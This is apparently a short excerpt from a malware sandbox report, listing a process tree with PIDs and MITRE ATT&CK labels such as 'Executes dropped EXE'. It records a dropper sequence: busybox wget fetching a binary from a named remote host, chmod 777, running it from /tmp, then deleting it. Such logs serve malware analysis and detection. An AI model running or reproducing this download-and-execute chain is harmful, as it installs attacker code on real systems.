-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- System Network Configuration Discovery
PID:1017
-
-
/bin/chmodchmod 777 X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- File and Directory Permissions Modification
PID:1018
-
-
/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame./X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Executes dropped EXE
PID:1019
-
-
/bin/rmrm X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:1021
-
Network
MITRE ATT&CK Enterprise v15
Downloads